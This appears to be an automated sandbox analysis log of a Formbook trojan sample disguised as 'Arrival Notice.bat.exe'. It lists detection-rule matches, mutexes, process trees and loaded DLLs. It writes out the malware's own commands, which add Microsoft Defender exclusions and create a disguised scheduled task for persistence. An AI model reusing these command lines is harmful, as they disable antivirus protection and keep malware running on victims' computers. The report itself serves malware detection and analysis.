              Source: 00000008.00000002.2003682546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000011.00000002.4145476325.0000000003AB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000019.00000002.4145544196.0000000002600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: Arrival Notice.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: dLrZsz.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: OdR8akYyHwr3ISR[1].exe.18.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: -6qxw.exe.18.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, Kk6SHmInle3YHeKsC7.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.Arrival Notice.bat.exe.8160000.5.raw.unpack, Kk6SHmInle3YHeKsC7.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.Arrival Notice.bat.exe.8160000.5.raw.unpack, gp4U7sEhP5rusid8QZ.csSecurity API names: _0020.SetAccessControl
              Source: 0.2.Arrival Notice.bat.exe.8160000.5.raw.unpack, gp4U7sEhP5rusid8QZ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.Arrival Notice.bat.exe.8160000.5.raw.unpack, gp4U7sEhP5rusid8QZ.csSecurity API names: _0020.AddAccessRule
              Source: 0.2.Arrival Notice.bat.exe.435eee0.1.raw.unpack, Kk6SHmInle3YHeKsC7.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, gp4U7sEhP5rusid8QZ.csSecurity API names: _0020.SetAccessControl
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, gp4U7sEhP5rusid8QZ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, gp4U7sEhP5rusid8QZ.csSecurity API names: _0020.AddAccessRule
              Source: 0.2.Arrival Notice.bat.exe.435eee0.1.raw.unpack, gp4U7sEhP5rusid8QZ.csSecurity API names: _0020.SetAccessControl
              Source: 0.2.Arrival Notice.bat.exe.435eee0.1.raw.unpack, gp4U7sEhP5rusid8QZ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.Arrival Notice.bat.exe.435eee0.1.raw.unpack, gp4U7sEhP5rusid8QZ.csSecurity API names: _0020.AddAccessRule
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@33/20@22/16
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeFile created: C:\Users\user\AppData\Roaming\dLrZsz.exeJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7720:120:WilError_03
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeMutant created: \Sessions\1\BaseNamedObjects\eSfeoiHugYzpJoxQBiDYFsD
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7180:120:WilError_03
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeMutant created: \Sessions\1\BaseNamedObjects\xTYvbBQtfRIAFDeihCxunVmrp
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7228:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7312:120:WilError_03
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeFile created: C:\Users\user\AppData\Local\Temp\tmp4908.tmpJump to behavior
              Source: Arrival Notice.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: Arrival Notice.bat.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: compact.exe, 00000012.00000003.2231241185.00000000025B4000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000012.00000003.2231355425.00000000025D5000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000012.00000002.4143560755.00000000025D5000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000003.3694768813.0000000000A07000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4143575378.0000000000A07000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000003.3694700127.00000000009E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: Arrival Notice.bat.exeReversingLabs: Detection: 26%
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeFile read: C:\Users\user\Desktop\Arrival Notice.bat.exe:Zone.IdentifierJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\Arrival Notice.bat.exe "C:\Users\user\Desktop\Arrival Notice.bat.exe"
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Arrival Notice.bat.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dLrZsz.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dLrZsz" /XML "C:\Users\user\AppData\Local\Temp\tmp4908.tmp"
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess created: C:\Users\user\Desktop\Arrival Notice.bat.exe "C:\Users\user\Desktop\Arrival Notice.bat.exe"
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\dLrZsz.exe C:\Users\user\AppData\Roaming\dLrZsz.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dLrZsz" /XML "C:\Users\user\AppData\Local\Temp\tmpEFDB.tmp"
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess created: C:\Users\user\AppData\Roaming\dLrZsz.exe "C:\Users\user\AppData\Roaming\dLrZsz.exe"
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeProcess created: C:\Windows\SysWOW64\compact.exe "C:\Windows\SysWOW64\compact.exe"
              Source: C:\Windows\SysWOW64\compact.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Windows\SysWOW64\compact.exeProcess created: C:\Users\user\AppData\Local\Temp\-6qxw.exe "C:\Users\user\AppData\Local\Temp\-6qxw.exe"
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess created: C:\Users\user\AppData\Local\Temp\-6qxw.exe "C:\Users\user\AppData\Local\Temp\-6qxw.exe"
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess created: C:\Users\user\AppData\Local\Temp\-6qxw.exe "C:\Users\user\AppData\Local\Temp\-6qxw.exe"
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeProcess created: C:\Windows\SysWOW64\runonce.exe "C:\Windows\SysWOW64\runonce.exe"
              Source: C:\Windows\SysWOW64\runonce.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Arrival Notice.bat.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dLrZsz.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dLrZsz" /XML "C:\Users\user\AppData\Local\Temp\tmp4908.tmp"Jump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess created: C:\Users\user\Desktop\Arrival Notice.bat.exe "C:\Users\user\Desktop\Arrival Notice.bat.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dLrZsz" /XML "C:\Users\user\AppData\Local\Temp\tmpEFDB.tmp"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess created: C:\Users\user\AppData\Roaming\dLrZsz.exe "C:\Users\user\AppData\Roaming\dLrZsz.exe"Jump to behavior
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeProcess created: C:\Windows\SysWOW64\compact.exe "C:\Windows\SysWOW64\compact.exe"
              Source: C:\Windows\SysWOW64\compact.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Windows\SysWOW64\compact.exeProcess created: C:\Users\user\AppData\Local\Temp\-6qxw.exe "C:\Users\user\AppData\Local\Temp\-6qxw.exe"
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess created: C:\Users\user\AppData\Local\Temp\-6qxw.exe "C:\Users\user\AppData\Local\Temp\-6qxw.exe"
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess created: C:\Users\user\AppData\Local\Temp\-6qxw.exe "C:\Users\user\AppData\Local\Temp\-6qxw.exe"
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeProcess created: C:\Windows\SysWOW64\runonce.exe "C:\Windows\SysWOW64\runonce.exe"
              Source: C:\Windows\SysWOW64\runonce.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
